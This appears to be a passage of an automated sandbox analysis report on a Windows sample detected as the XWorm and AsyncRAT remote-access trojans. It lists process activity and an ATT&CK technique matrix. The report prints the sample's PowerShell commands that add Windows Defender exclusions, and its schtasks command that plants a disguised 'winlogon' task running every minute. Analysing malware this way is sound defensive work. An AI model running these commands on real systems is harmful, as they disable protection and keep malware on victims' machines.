              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\ProgramData\winlogon.exeProcess token adjusted: Debug
              Source: C:\ProgramData\winlogon.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe'
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe'
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe'
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1bE8S5sN9S.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winlogon.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe"Jump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeQueries volume information: C:\Users\user\Desktop\1bE8S5sN9S.exe VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\ProgramData\winlogon.exeQueries volume information: C:\ProgramData\winlogon.exe VolumeInformation
              Source: C:\ProgramData\winlogon.exeQueries volume information: C:\ProgramData\winlogon.exe VolumeInformation
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Yara detected AsyncRAT
              Source: Yara matchFile source: Process Memory Space: 1bE8S5sN9S.exe PID: 5580, type: MEMORYSTR
              Source: 1bE8S5sN9S.exe, 00000000.00000002.3362232387.000000001C620000.00000004.00000020.00020000.00000000.sdmp, 1bE8S5sN9S.exe, 00000000.00000002.3343268242.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 1bE8S5sN9S.exe, 00000000.00000002.3355418142.000000001B3D5000.00000004.00000020.00020000.00000000.sdmp, 1bE8S5sN9S.exe, 00000000.00000002.3355418142.000000001B360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 1bE8S5sN9S.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.1bE8S5sN9S.exe.200000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.2078758497.0000000000202000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 1bE8S5sN9S.exe PID: 5580, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\winlogon.exe, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 1bE8S5sN9S.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.1bE8S5sN9S.exe.200000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.2078758497.0000000000202000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 1bE8S5sN9S.exe PID: 5580, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\winlogon.exe, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		2
              Scheduled Task/Job              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping221
              Security Software Discovery              		Remote Services11
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Scheduled Task/Job              		1
              DLL Side-Loading              		2
              Scheduled Task/Job              		11
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop Protocol1
              Clipboard Data              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)1
              DLL Side-Loading              		131
              Virtualization/Sandbox Evasion              		Security Account Manager131
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture1
              Ingress Tool Transfer              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
              Obfuscated Files or Information              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input Capture13
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
